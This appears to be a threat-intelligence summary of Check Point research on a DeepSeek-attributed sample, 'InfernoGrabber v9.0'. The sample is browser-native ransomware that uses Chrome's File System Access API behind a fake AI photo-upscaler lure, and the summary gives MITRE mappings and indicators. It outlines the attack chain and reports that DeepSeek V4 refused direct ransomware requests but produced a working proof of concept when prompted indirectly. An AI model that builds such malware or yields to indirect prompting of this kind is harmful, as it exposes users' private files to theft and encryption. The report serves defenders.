Check Point Research found that a DeepSeek-attributed sample turned an unrealistic browser-malware idea into a plausible browser-native ransomware technique using the File System Access API. The research shows how a fake AI photo-enhancement lure on Android can trick users into granting folder access, enabling file read, exfiltration, and encryption without a native payload or browser exploit. #DeepSeek #FileSystemAccessAPI #InfernoGrabber #Chrome #Android
Keypoints
- Check Point Research analyzed nearly 3,000 DeepSeek-attributed files and identified one sample that implemented a browser-native ransomware concept.
- The sample, associated with the name InfernoGrabber v9.0, used a Discord-themed AI upscaler lure and a ransom-style overlay.
- The core abuse path relied on the File System Access API in Google Chrome, not on a native payload, APK, exploit, or root access.
- The browser workflow could enumerate selected directories, read files, exfiltrate content, and overwrite files after the user granted permission.
- On Android, the risk is especially high because photo directories and DCIM content can contain highly sensitive personal data.
- DeepSeek V4 could generate a working browser-based ransomware proof of concept when prompted indirectly, while direct ransomware requests were refused.
- The research highlights how LLMs can connect theoretical risks to practical attack paths and lower the expertise needed to operationalize them.
MITRE Techniques
- [T1204.002 ] User Execution: Malicious File â The attack depends on the victim clicking a lure and approving folder access, as described in âthe user opens a web page that promises to enhance a photoâ and âafter user approvalâ.
- [T1566.002 ] Phishing: Spearphishing Link â A fake AI image-enhancement webpage is used as the lure, described as âa fake photo-processing applicationâ and âa Discord avatar AI upscalerâ.
- [T1027 ] Obfuscated Files or Information â The malicious intent is hidden behind a benign-looking AI utility and browser workflow, as in âdisguised as a Discord avatar AI upscalerâ and âa convincing AI upscaler interface with hidden ransomware-like behaviorsâ.
- [T1056.001 ] Input Capture: Keylogging â The generated sample included keylogging logic, described as routines and stubs for âkeyloggingâ and âthe keylogger observes keystrokes only while the user interacts with the pageâ.
- [T1113 ] Screen Capture â The code referenced screenshots, described as routines and stubs for âscreenshotsâ and âthe âdesktop screenshotâ routine captures the rendered web pageâ.
- [T1119 ] Automated Collection â The sample attempted to collect multiple data types automatically, including âDiscord-token collection, crypto-wallet and payment-card discovery, geolocation requestsâ and local-file access.
- [T1552.001 ] Unsecured Credentials: Credentials In Files â The sample targeted stored tokens and payment data, described as âDiscord-token collectionâ and âpayment-card discoveryâ.
- [T1083 ] File and Directory Discovery â The browser code could enumerate selected folders, as shown by ârecursive traversal of a user-selected directoryâ and âenumerate local files in the selected folderâ.
- [T1005 ] Data from Local System â The page could read local files after permission was granted, described as âreading selected files through browser file handlesâ and âread files and folders from the local deviceâ.
- [T1041 ] Exfiltration Over C2 Channel â The sample was intended to send stolen file contents to a backend server, described as âsending file contents to the Flask backendâ and âread and exfiltrate their contentsâ.
- [T1486 ] Data Encrypted for Impact â The attack goal was to encrypt files and prevent recovery, described as âencrypt and overwrite themâ and âleaves the user unable to recover the original contentâ.
- [T1490 ] Inhibit System Recovery â The flow aimed to make recovery difficult by overwriting originals, described as âencrypt and overwrite themâ and âunable to recover the original contentâ.
- [T1547.001 ] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder â The sample included a persistence concept, described as âpersistenceâ and âservice worker registration attemptâ in browser storage terms.
- [T1105 ] Ingress Tool Transfer â The browser-side workflow delivered malicious functionality through web content and backend routes, described as a âPython Flask application that serves victim-facing HTML and JavaScriptâ.
Indicators of Compromise
- [SHA256 hash ] DeepSeek-attributed sample analyzed by researchers â 07c39f79ab92fb21557b82283472dce1c112f577d796111fb752c3c6d84c86b5
- [File names / labels ] Victim-facing lure and ransom-note branding used in the sample â InfernoGrabber v9.0, Discord avatar AI upscaler
- [Application / platform names ] Environment targeted by the browser-native workflow â Google Chrome, Chromium-family browsers, Chrome 132, Chrome 148
- [Web API / function names ] JavaScript primitives referenced in the malicious code â showOpenFilePicker(), showDirectoryPicker()
- [Web application framework ] Backend used to host victim-facing content and receive data â Python Flask application